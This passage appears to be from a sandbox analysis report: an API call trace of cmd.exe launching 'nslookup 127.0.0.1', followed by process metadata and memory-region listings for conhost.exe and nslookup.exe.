7 [0276.637] _wcsicmp (_String1="nslookup", _String2="SHIFT") returned -5 [0276.637] _wcsicmp (_String1="nslookup", _String2="CLS") returned 11 [0276.637] _wcsicmp (_String1="nslookup", _String2="CALL") returned 11 [0276.637] _wcsicmp (_String1="nslookup", _String2="VERIFY") returned -8 [0276.637] _wcsicmp (_String1="nslookup", _String2="VER") returned -8 [0276.637] _wcsicmp (_String1="nslookup", _String2="VOL") returned -8 [0276.637] _wcsicmp (_String1="nslookup", _String2="EXIT") returned 9 [0276.637] _wcsicmp (_String1="nslookup", _String2="SETLOCAL") returned -5 [0276.637] _wcsicmp (_String1="nslookup", _String2="ENDLOCAL") returned 9 [0276.637] _wcsicmp (_String1="nslookup", _String2="TITLE") returned -6 [0276.637] _wcsicmp (_String1="nslookup", _String2="START") returned -5 [0276.637] _wcsicmp (_String1="nslookup", _String2="DPATH") returned 10 [0276.637] _wcsicmp (_String1="nslookup", _String2="KEYS") returned 3 [0276.637] _wcsicmp (_String1="nslookup", _String2="MOVE") returned 1 [0276.637] _wcsicmp (_String1="nslookup", _String2="PUSHD") returned -2 [0276.637] _wcsicmp (_String1="nslookup", _String2="POPD") returned -2 [0276.637] _wcsicmp (_String1="nslookup", _String2="ASSOC") returned 13 [0276.637] _wcsicmp (_String1="nslookup", _String2="FTYPE") returned 8 [0276.637] _wcsicmp (_String1="nslookup", _String2="BREAK") returned 12 [0276.637] _wcsicmp (_String1="nslookup", _String2="COLOR") returned 11 [0276.637] _wcsicmp (_String1="nslookup", _String2="MKLINK") returned 1 [0276.637] _wcsicmp (_String1="nslookup", _String2="DIR") returned 10 [0276.637] _wcsicmp (_String1="nslookup", _String2="ERASE") returned 9 [0276.637] _wcsicmp (_String1="nslookup", _String2="DEL") returned 10 [0276.637] _wcsicmp (_String1="nslookup", _String2="TYPE") returned -6 [0276.637] _wcsicmp (_String1="nslookup", _String2="COPY") returned 11 [0276.637] _wcsicmp (_String1="nslookup", _String2="CD") returned 11 [0276.637] _wcsicmp (_String1="nslookup", _String2="CHDIR") returned 11 [0276.637] _wcsicmp (_String1="nslookup", _String2="RENAME") returned -4 [0276.637] _wcsicmp (_String1="nslookup", _String2="REN") returned -4 [0276.637] _wcsicmp (_String1="nslookup", _String2="ECHO") returned 9 [0276.637] _wcsicmp (_String1="nslookup", _String2="SET") returned -5 [0276.637] _wcsicmp (_String1="nslookup", _String2="PAUSE") returned -2 [0276.637] _wcsicmp (_String1="nslookup", _String2="DATE") returned 10 [0276.637] _wcsicmp (_String1="nslookup", _String2="TIME") returned -6 [0276.637] _wcsicmp (_String1="nslookup", _String2="PROMPT") returned -2 [0276.637] _wcsicmp (_String1="nslookup", _String2="MD") returned 1 [0276.638] _wcsicmp (_String1="nslookup", _String2="MKDIR") returned 1 [0276.638] _wcsicmp (_String1="nslookup", _String2="RD") returned -4 [0276.638] _wcsicmp (_String1="nslookup", _String2="RMDIR") returned -4 [0276.638] _wcsicmp (_String1="nslookup", _String2="PATH") returned -2 [0276.638] _wcsicmp (_String1="nslookup", _String2="GOTO") returned 7 [0276.638] _wcsicmp (_String1="nslookup", _String2="SHIFT") returned -5 [0276.638] _wcsicmp (_String1="nslookup", _String2="CLS") returned 11 [0276.638] _wcsicmp (_String1="nslookup", _String2="CALL") returned 11 [0276.638] _wcsicmp (_String1="nslookup", _String2="VERIFY") returned -8 [0276.638] _wcsicmp (_String1="nslookup", _String2="VER") returned -8 [0276.638] _wcsicmp (_String1="nslookup", _String2="VOL") returned -8 [0276.638] _wcsicmp (_String1="nslookup", _String2="EXIT") returned 9 [0276.638] _wcsicmp (_String1="nslookup", _String2="SETLOCAL") returned -5 [0276.638] _wcsicmp (_String1="nslookup", _String2="ENDLOCAL") returned 9 [0276.638] _wcsicmp (_String1="nslookup", _String2="TITLE") returned -6 [0276.638] _wcsicmp (_String1="nslookup", _String2="START") returned -5 [0276.638] _wcsicmp (_String1="nslookup", _String2="DPATH") returned 10 [0276.638] _wcsicmp (_String1="nslookup", _String2="KEYS") returned 3 [0276.638] _wcsicmp (_String1="nslookup", _String2="MOVE") returned 1 [0276.638] _wcsicmp (_String1="nslookup", _String2="PUSHD") returned -2 [0276.638] _wcsicmp (_String1="nslookup", _String2="POPD") returned -2 [0276.638] _wcsicmp (_String1="nslookup", _String2="ASSOC") returned 13 [0276.638] _wcsicmp (_String1="nslookup", _String2="FTYPE") returned 8 [0276.638] _wcsicmp (_String1="nslookup", _String2="BREAK") returned 12 [0276.638] _wcsicmp (_String1="nslookup", _String2="COLOR") returned 11 [0276.638] _wcsicmp (_String1="nslookup", _String2="MKLINK") returned 1 [0276.638] _wcsicmp (_String1="nslookup", _String2="FOR") returned 8 [0276.638] _wcsicmp (_String1="nslookup", _String2="IF") returned 5 [0276.638] _wcsicmp (_String1="nslookup", _String2="REM") returned -4 [0276.639] _wcsnicmp (_String1="nslo", _String2="cmd ", _MaxCount=0x4) returned 11 [0276.639] SetErrorMode (uMode=0x0) returned 0x0 [0276.639] SetErrorMode (uMode=0x1) returned 0x0 [0276.639] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xa1b5aa65d0, lpFilePart=0xa1b593ed80 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0xa1b593ed80*="system32") returned 0x13 [0276.639] SetErrorMode (uMode=0x0) returned 0x1 [0276.640] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff60d9f8680, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0276.640] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0276.647] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff60d9f8680, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0276.648] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0276.648] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\nslookup.*", fInfoLevelId=0x1, lpFindFileData=0xa1b593eb00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa1b593eb00) returned 0xa1b5aa6970 [0276.648] FindClose (in: hFindFile=0xa1b5aa6970 | out: hFindFile=0xa1b5aa6970) returned 1 [0276.649] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\nslookup.COM", fInfoLevelId=0x1, lpFindFileData=0xa1b593eb00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa1b593eb00) returned 0xffffffffffffffff [0276.649] GetLastError () returned 0x2 [0276.649] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\nslookup.EXE", fInfoLevelId=0x1, lpFindFileData=0xa1b593eb00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa1b593eb00) returned 0xa1b5aa6970 [0276.649] FindClose (in: hFindFile=0xa1b5aa6970 | out: hFindFile=0xa1b5aa6970) returned 1 [0276.649] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0276.649] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0276.649] GetConsoleTitleW (in: lpConsoleTitle=0xa1b593f060, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0276.649] InitializeProcThreadAttributeList (in: lpAttributeList=0xa1b593ef80, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xa1b593ee80 | out: lpAttributeList=0xa1b593ef80, lpSize=0xa1b593ee80) returned 1 [0276.650] UpdateProcThreadAttribute (in: lpAttributeList=0xa1b593ef80, dwFlags=0x0, Attribute=0x60001, lpValue=0xa1b593ee6c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xa1b593ef80, lpPreviousValue=0x0) returned 1 [0276.650] GetStartupInfoW (in: lpStartupInfo=0xa1b593ef10 | out: lpStartupInfo=0xa1b593ef10*(cb=0x68, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0276.650] _wcsnicmp (_String1="COPYCMD", _String2="=::=::\\", _MaxCount=0x7) returned 38 [0276.650] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0276.650] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0276.650] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0276.650] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0276.650] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0276.650] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0276.650] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0276.650] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0276.650] _wcsnicmp (_String1="COPYCMD", _String2="FPS_BRO", _MaxCount=0x7) returned -3 [0276.650] _wcsnicmp (_String1="COPYCMD", _String2="FPS_BRO", _MaxCount=0x7) returned -3 [0276.650] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0276.650] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0276.650] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0276.650] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0276.650] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0276.650] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0276.650] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0276.650] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0276.650] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0276.650] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0276.650] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0276.650] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0276.650] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0276.651] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0276.651] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0276.651] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0276.651] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0276.651] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0276.651] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0276.651] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0276.651] _wcsnicmp (_String1="COPYCMD", _String2="SESSION", _MaxCount=0x7) returned -16 [0276.651] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0276.651] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0276.651] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0276.651] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0276.651] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0276.651] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0276.651] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0276.651] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0276.651] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0276.651] lstrcmpW (lpString1="\\nslookup.exe", lpString2="\\XCOPY.EXE") returned -1 [0276.652] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\nslookup.exe", lpCommandLine="nslookup 127.0.0.1 ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0xa1b593eea0*(cb=0x70, lpReserved=0x0, lpDesktop="Winsta0\\Default", lpTitle="nslookup 127.0.0.1 ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xa1b593ee88 | out: lpCommandLine="nslookup 127.0.0.1 ", lpProcessInformation=0xa1b593ee88*(hProcess=0x90, hThread=0x8c, dwProcessId=0x114, dwThreadId=0x510)) returned 1 [0276.797] CloseHandle (hObject=0x8c) returned 1 [0276.797] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0276.797] GetEnvironmentStringsW () returned 0xa1b5aa80e0* [0276.797] FreeEnvironmentStringsA (penv="=") returned 1 [0276.797] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0xffffffff) returned 0x0 [0276.962] GetExitCodeProcess (in: hProcess=0x90, lpExitCode=0xa1b593ee08 | out: lpExitCode=0xa1b593ee08*=0x0) returned 1 [0276.962] CloseHandle (hObject=0x90) returned 1 [0276.962] _vsnwprintf (in: _Buffer=0xa1b593efc8, _BufferCount=0x13, _Format="%08X", _ArgList=0xa1b593ee18 | out: _Buffer="00000000") returned 8 [0276.963] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0276.963] GetEnvironmentStringsW () returned 0xa1b5ab8510* [0276.963] FreeEnvironmentStringsA (penv="=") returned 1 [0276.963] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0276.963] GetEnvironmentStringsW () returned 0xa1b5ab8510* [0276.963] FreeEnvironmentStringsA (penv="=") returned 1 [0276.963] DeleteProcThreadAttributeList (in: lpAttributeList=0xa1b593ef80 | out: lpAttributeList=0xa1b593ef80) [0276.963] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0276.964] _close (_FileHandle=3) returned 0 [0276.964] _get_osfhandle (_FileHandle=1) returned 0x24 [0276.964] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x3) returned 1 [0276.965] _get_osfhandle (_FileHandle=1) returned 0x24 [0276.965] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff60d9f85ec | out: lpMode=0x7ff60d9f85ec) returned 1 [0276.965] _get_osfhandle (_FileHandle=0) returned 0x20 [0276.965] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff60d9f85e8 | out: lpMode=0x7ff60d9f85e8) returned 1 [0276.965] SetConsoleInputExeNameW () returned 0x1 [0276.965] GetConsoleOutputCP () returned 0x1b5 [0276.966] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff60d9f8640 | out: lpCPInfo=0x7ff60d9f8640) returned 1 [0276.966] SetThreadUILanguage (LangId=0x0) returned 0x409 [0276.966] exit (_Code=0) Thread: id = 262 os_tid = 0xaf8 Process: id = "32" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x3d19e000" os_pid = "0x81c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "31" os_parent_pid = "0x420" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00018e8d" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2944 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2945 start_va = 0xdfd3e70000 end_va = 0xdfd3e8ffff entry_point = 0x0 region_type = private name = "private_0x000000dfd3e70000" filename = "" Region: id = 2946 start_va = 0xdfd3e90000 end_va = 0xdfd3ea3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000dfd3e90000" filename = "" Region: id = 2947 start_va = 0xdfd3eb0000 end_va = 0xdfd3eeffff entry_point = 0x0 region_type = private name = "private_0x000000dfd3eb0000" filename = "" Region: id = 2948 start_va = 0x7df5ffc60000 end_va = 0x7ff5ffc5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffc60000" filename = "" Region: id = 2949 start_va = 0x7ff683850000 end_va = 0x7ff683872fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff683850000" filename = "" Region: id = 2950 start_va = 0x7ff68387b000 end_va = 0x7ff68387bfff entry_point = 0x0 region_type = private name = "private_0x00007ff68387b000" filename = "" Region: id = 2951 start_va = 0x7ff68387e000 end_va = 0x7ff68387ffff entry_point = 0x0 region_type = private name = "private_0x00007ff68387e000" filename = "" Region: id = 2952 start_va = 0x7ff6847f0000 end_va = 0x7ff684800fff entry_point = 0x7ff6847f0000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 2953 start_va = 0x7ff977f30000 end_va = 0x7ff9780f1fff entry_point = 0x7ff977f30000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2954 start_va = 0xdfd4010000 end_va = 0xdfd410ffff entry_point = 0x0 region_type = private name = "private_0x000000dfd4010000" filename = "" Region: id = 2955 start_va = 0x7ff9753d0000 end_va = 0x7ff9755acfff entry_point = 0x7ff9753d0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2956 start_va = 0x7ff977ab0000 end_va = 0x7ff977b5cfff entry_point = 0x7ff977ab0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2957 start_va = 0xdfd3e70000 end_va = 0xdfd3e7ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000dfd3e70000" filename = "" Region: id = 2958 start_va = 0xdfd3e80000 end_va = 0xdfd3e86fff entry_point = 0x0 region_type = private name = "private_0x000000dfd3e80000" filename = "" Region: id = 2959 start_va = 0xdfd3ef0000 end_va = 0xdfd3fadfff entry_point = 0xdfd3ef0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2960 start_va = 0xdfd3fb0000 end_va = 0xdfd3feffff entry_point = 0x0 region_type = private name = "private_0x000000dfd3fb0000" filename = "" Region: id = 2961 start_va = 0xdfd3ff0000 end_va = 0xdfd3ff0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000dfd3ff0000" filename = "" Region: id = 2962 start_va = 0xdfd4000000 end_va = 0xdfd4006fff entry_point = 0x0 region_type = private name = "private_0x000000dfd4000000" filename = "" Region: id = 2963 start_va = 0xdfd4110000 end_va = 0xdfd4110fff entry_point = 0x0 region_type = private name = "private_0x000000dfd4110000" filename = "" Region: id = 2964 start_va = 0xdfd4120000 end_va = 0xdfd4120fff entry_point = 0x0 region_type = private name = "private_0x000000dfd4120000" filename = "" Region: id = 2965 start_va = 0xdfd4160000 end_va = 0xdfd416ffff entry_point = 0x0 region_type = private name = "private_0x000000dfd4160000" filename = "" Region: id = 2966 start_va = 0xdfd4170000 end_va = 0xdfd42f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000dfd4170000" filename = "" Region: id = 2967 start_va = 0xdfd4300000 end_va = 0xdfd4480fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000dfd4300000" filename = "" Region: id = 2968 start_va = 0xdfd4490000 end_va = 0xdfd588ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000dfd4490000" filename = "" Region: id = 2969 start_va = 0x7ff683750000 end_va = 0x7ff68384ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff683750000" filename = "" Region: id = 2970 start_va = 0x7ff68387c000 end_va = 0x7ff68387dfff entry_point = 0x0 region_type = private name = "private_0x00007ff68387c000" filename = "" Region: id = 2971 start_va = 0x7ff971180000 end_va = 0x7ff971302fff entry_point = 0x7ff971180000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 2972 start_va = 0x7ff9722f0000 end_va = 0x7ff972342fff entry_point = 0x7ff9722f0000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 2973 start_va = 0x7ff9757b0000 end_va = 0x7ff9758fdfff entry_point = 0x7ff9757b0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2974 start_va = 0x7ff977200000 end_va = 0x7ff97735bfff entry_point = 0x7ff977200000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2975 start_va = 0x7ff9773c0000 end_va = 0x7ff97745cfff entry_point = 0x7ff9773c0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2976 start_va = 0x7ff9774c0000 end_va = 0x7ff977644fff entry_point = 0x7ff9774c0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2977 start_va = 0x7ff9776c0000 end_va = 0x7ff97771afff entry_point = 0x7ff9776c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2978 start_va = 0x7ff977720000 end_va = 0x7ff977755fff entry_point = 0x7ff977720000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2979 start_va = 0x7ff977760000 end_va = 0x7ff97781dfff entry_point = 0x7ff977760000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2980 start_va = 0x7ff977830000 end_va = 0x7ff977aabfff entry_point = 0x7ff977830000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 2981 start_va = 0x7ff977b60000 end_va = 0x7ff977ca0fff entry_point = 0x7ff977b60000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2982 start_va = 0x7ff977df0000 end_va = 0x7ff977f15fff entry_point = 0x7ff977df0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Thread: id = 259 os_tid = 0x814 Thread: id = 260 os_tid = 0xa8c Thread: id = 261 os_tid = 0xa90 Process: id = "33" image_name = "nslookup.exe" filename = "c:\\windows\\system32\\nslookup.exe" page_root = "0x3d509000" os_pid = "0x114" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "31" os_parent_pid = "0x420" cmd_line = "nslookup 127.0.0.1 " cur_dir = "C:\\Windows\\system32\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00018e8d" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2993 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2994 start_va = 0xee681f0000 end_va = 0xee6820ffff entry_point = 0x0 region_type = private name = "private_0x000000ee681f0000" filename = "" Region: id = 2995 start_va = 0xee68210000 end_va = 0xee68223fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ee68210000" filename = "" Region: id = 2996 start_va = 0xee68230000 end_va = 0xee682affff entry_point = 0x0 region_type = private name = "private_0x000000ee68230000" filename = "" Region: id = 2997 start_va = 0xee682b0000 end_va = 0xee682b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ee682b0000" filename = "" Region: id = 2998 start_va = 0xee682c0000 end_va = 0xee682c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ee682c0000" filename = "" Region: id = 2999 start_va = 0xee682d0000 end_va = 0xee682d1fff entry_point = 0x0 region_type = private name = "private_0x000000ee682d0000" filename = "" Region: id = 3000 start_va = 0x7df5ffed0000 end_va = 0x7ff5ffecffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffed0000" filename = "" Region: id = 3001 start_va = 0x7ff61e0e0000 end_va = 0x7ff61e102fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff61e0e0000" filename = "" Region: id = 3002 start_va = 0x7ff61e10d000 end_va = 0x7ff61e10efff entry_point = 0x0 region_type = private name = "private_0x00007ff61e10d000" filename = "" Region: id = 3003 start_va = 0x7ff61e10f000 end_va = 0x7ff61e10ffff entry_point = 0x0 region_type = private name = "private_0x00007ff61e10f000" filename = "" Region: id = 3004 start_va = 0x7ff61e670000 end_va = 0x7ff61e68afff entry_point = 0x7ff61e670000 region_type = mapped_file name = "nslookup.exe" filename = "\\Windows\\System32\\nslookup.exe" (normalized: "c:\\windows\\system32\\nslookup.exe") Region: id = 3005 start_va = 0x7ff977f30000 end_va = 0x7ff9780f1fff entry_point = 0x7ff977f30000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3006 start_va = 0xee68470000 end_va = 0xee6856ffff entry_point = 0x0 region_type = private name = "private_0x000000ee68470000" filename = "" Region: id = 3007 start_va = 0x7ff9753d0000 end_va = 0x7ff9755acfff entry_point = 0x7ff9753d0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 3008 start_va = 0x7ff977ab0000 end_va = 0x7ff977b5cfff entry_point = 0x7ff977ab0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3009 start_va = 0xee681f0000 end_va = 0xee681fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ee681f0000" filename = "" Region: id = 3010 start_va = 0xee68200000 end_va = 0xee68206fff entry_point = 0x0 region_type = private name = "private_0x000000ee68200000" filename = "" Region: id = 3011 start_va = 0xee682e0000 end_va = 0xee6839dfff entry_point = 0xee682e0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3012 start_va = 0xee683a0000 end_va = 0xee6841ffff entry_point = 0x0 region_type = private name = "private_0x000000ee683a0000" filename = "" Region: id = 3013 start_va = 0xee68420000 end_va = 0xee68426fff entry_point = 0x0 region_type = private name = "private_0x000000ee68420000" filename = "" Region: id = 3014 start_va = 0xee68630000 end_va = 0xee6863ffff entry_point = 0x0 region_type = private name = "private_0x000000ee68630000" filename = "" Region: id = 3015 start_va = 0x7ff61dfe0000 end_va = 